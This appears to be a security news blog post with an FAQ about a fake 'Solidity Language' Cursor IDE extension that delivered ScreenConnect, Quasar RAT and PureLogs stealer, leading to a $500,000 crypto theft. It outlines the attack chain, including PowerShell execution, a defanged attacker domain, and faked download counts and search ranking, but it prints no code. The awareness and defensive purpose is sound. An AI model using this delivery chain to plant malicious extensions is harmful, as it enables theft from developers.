What is the real risk behind malicious VSCode extensions like the Cursor IDE incident?

In July 2025, a Russian crypto developer lost $500,000 due to a malicious “Solidity Language” extension in the Cursor AI IDE. This fake extension used PowerShell scripts to install remote access tools like Quasar RAT and PureLogs stealer, allowing attackers to steal cryptocurrency wallets and sensitive information. Despite being listed on Open VSX with thousands of fake downloads, it went undetected until a forensic investigation by Kaspersky. Developers are now advised to verify extensions, check for unusual system behavior, and install antivirus protections to avoid similar attacks.

  Security News & Threat Intelligence   Jul 15, 2025   64  Add to Reading List

Table of Contents

In July 2025, a serious cybersecurity incident shocked the crypto development community: a fake extension in the Cursor AI IDE led to the theft of $500,000 in cryptocurrency from a Russian developer. This attack shows how supply chain threats targeting software extensions can result in major financial loss, even for experienced users.

This blog explains the full incident, how the attack worked, and what steps developers and organizations can take to avoid similar threats.

What Happened: $500,000 Crypto Theft Through Cursor IDE Extension

Cursor AI IDE, an AI-powered development environment based on Microsoft’s Visual Studio Code, allows users to install extensions from Open VSX, an open-source marketplace.

In this case, attackers published a fake extension named "Solidity Language," pretending to be a syntax-highlighting tool for Ethereum smart contracts. The malicious extension secretly installed remote access and infostealer malware, allowing hackers to steal sensitive information and eventually drain $500,000 from the developer’s crypto wallet.

How the Attack Worked — Step-by-Step Breakdown

Attack Stage Description
Fake Extension Upload A fake "Solidity Language" extension was uploaded to Open VSX.
Malicious JavaScript (extension.js) Located in the .cursor/extensions directory; executed PowerShell scripts.
PowerShell Execution Connected to angelic[.]su server to download further malicious payloads.
Remote Access Installation Installed ScreenConnect for full remote access.
Payload Deployment Uploaded additional malware files using ScreenConnect.
Malware Installed Quasar RAT and PureLogs stealer were installed to capture sensitive information.
Crypto Theft Attackers accessed crypto wallet credentials and transferred funds.

What Is Cursor AI IDE?

Cursor AI IDE is a smart development tool similar to Visual Studio Code but enhanced with AI features. It supports the Open VSX registry, where users can download extensions to expand functionality.

Unfortunately, this open system also makes it easier for attackers to upload fake or malicious extensions.

Malware Types Involved in the Attack

  • Quasar RAT (Remote Access Trojan):
    Allows attackers full control over the infected device, including running commands, capturing screenshots, and keylogging.

  • PureLogs Stealer:
    Specialized in stealing browser cookies, saved passwords, and cryptocurrency wallet information.

How Did Hackers Trick Developers?

  • Uploaded fake extensions with believable names like “Solidity Language.”

  • Used fake install counts — one version had 54,000 downloads, another nearly 2 million.

  • Manipulated Open VSX’s search ranking algorithm so the fake extension showed up before the real one.

  • Used Microsoft’s Visual Studio Code Marketplace with similar fake extensions like "solaibot," "among-eth," and "blankebesxstnion."

Real-World Example: How the Russian Crypto Developer Was Targeted

According to Kaspersky’s investigation:

  • The developer had no antivirus installed but thought their system was clean.

  • After forensic analysis, Kaspersky found extension.js executing PowerShell scripts.

  • The system was infected, leading to the loss of half a million dollars in cryptocurrency.

Why This Matters for Developers in 2025

The crypto industry relies heavily on open-source tools and third-party extensions. If even experienced developers can fall for such attacks, anyone using open marketplaces like Open VSX or Visual Studio Code Marketplace is at risk.

How to Protect Yourself from Malicious Extensions

 Verify Every Extension:

  • Check publisher details and official links.

  • Avoid extensions with unusually high install counts without reviews.

 Monitor System Behavior:

  • If an extension behaves unusually or doesn’t work as expected, investigate immediately.

 Use Antivirus and EDR Tools:

  • Ensure devices have real-time protection.

  • Scan downloaded extensions before installing.

 Prefer Official Marketplaces:

  • Download from trusted sources whenever possible.

  • Be cautious with Open VSX and similar repositories.

Check Source Code:

  • If you’re a developer, inspect the extension’s source files.

  • Malicious scripts often hide in files like extension.js or unusual directories.

Closing Thoughts

The malicious Cursor AI IDE extension attack is a clear reminder: even trusted tools can become attack vectors through fake add-ons and supply chain manipulation.

Kaspersky’s advice is simple but critical:

  • Always verify what you install.

  • Stay skeptical of inflated download numbers.

  • Monitor your systems and wallets for unusual activity.

Supply chain attacks targeting developers are not going away — and staying vigilant is now part of everyday security hygiene for IT professionals.

FAQs

What happened in the Cursor IDE crypto theft incident?

A fake VSCode-compatible extension named "Solidity Language" in Cursor AI IDE was used to install remote access malware, leading to a $500,000 crypto theft from a Russian developer.

How did attackers hide the malicious extension?

They published it on Open VSX, inflated the download count, and manipulated search rankings so it appeared higher than the legitimate Solidity syntax extension.

What malware was involved in the Cursor IDE attack?

Quasar RAT for remote access and PureLogs stealer for stealing credentials and cryptocurrency wallet information.

How many times was the malicious extension downloaded?

The fake “Solidity Language” extension was downloaded over 54,000 times before removal, while a variant called “solidity” reached nearly two million downloads.

What tools did attackers use for remote access?

ScreenConnect remote management tool was installed via PowerShell scripts embedded in the malicious extension.

Why are crypto developers at risk from such attacks?

Crypto developers often use third-party open-source tools, making them vulnerable to fake packages that target sensitive wallet information.

How can developers avoid malicious VSCode extensions?

Verify publisher credentials, avoid unknown or suspicious extensions, check source code when possible, and use endpoint security tools.

Is Open VSX considered secure now?

Open VSX has removed the malicious extensions, but users should remain cautious as such repositories can still host dangerous packages.

What is Cursor AI IDE?

Cursor AI IDE is an AI-powered development environment based on Visual Studio Code that allows installing VSCode-compatible extensions.

How did Kaspersky investigate the incident?

They analyzed an image of the victim’s hard drive, identified extension.js as malicious, and traced its activities, including remote server connections.

Can antivirus software detect such attacks?

Modern antivirus solutions can detect related malware like Quasar RAT and PureLogs if properly configured.

What is a supply chain attack in software?

It’s when attackers insert malicious code or tools into legitimate development resources like extensions, libraries, or packages.

Why were fake download counts used by attackers?

To make the fake extension appear popular and trustworthy, increasing its chances of being installed by unsuspecting developers.

Is Visual Studio Code Marketplace also affected?

Similar fake extensions like "solaibot" and "among-eth" were found on Visual Studio Code Marketplace, not just Open VSX.

What is the difference between legitimate and fake extensions?

Fake extensions contain hidden malicious code and don’t function as advertised, while legitimate ones perform their stated function securely.

How do PowerShell scripts get executed through extensions?

Malicious JavaScript files in extensions can trigger PowerShell commands that download and run malware from remote servers.

How did attackers persist after installation?

By installing ScreenConnect, which provides ongoing remote access and control over the victim’s system.

Can extension marketplaces prevent such attacks?

Marketplaces can improve security with better vetting and monitoring, but users must also remain cautious and vigilant.

What’s the role of Quasar RAT in this attack?

Quasar RAT was used to execute remote commands, monitor activity, and download further malicious payloads on the victim’s machine.

How does PureLogs stealer work?

It collects sensitive data like browser cookies, saved passwords, and cryptocurrency wallet files.

What precautions should crypto developers take now?

Only use verified extensions, monitor system processes, back up wallets securely, and employ endpoint detection and response (EDR) solutions.

Was this the first attack using Cursor IDE?

No official record suggests it was the first, but this incident highlights a growing trend of targeting AI-enhanced development tools.

How long did the malicious extension stay live?

It was removed on July 2, 2025, but it had been available long enough to amass tens of thousands of downloads.

What is extension.js in Cursor IDE?

A JavaScript file within the malicious extension that executed PowerShell scripts leading to malware installation.

Why didn’t antivirus detect it earlier?

The victim did not have antivirus software installed, and attackers used legitimate tools like ScreenConnect to evade detection.

What is Open VSX?

An open-source extension marketplace for VSCode-compatible development environments like Cursor IDE.

How can teams monitor for similar attacks?

Implement monitoring systems that detect unusual network connections, file changes, and unauthorized software installations.

What is ScreenConnect used for in attacks?

While ScreenConnect is a legitimate remote management tool, attackers use it to gain unauthorized access to victims’ systems.

Why are AI-enhanced IDEs like Cursor IDE targeted?

Because they’re newer platforms with less mature security controls and attract developers working with valuable digital assets.

How can organizations secure their development environments?

Use trusted repositories, restrict extension installations, monitor system activity, and educate teams on supply chain risks.

What lessons can be learned from this incident?

Always verify third-party tools, monitor download sources, and prioritize cybersecurity even in development environments.

Join Our Upcoming Class!

Tags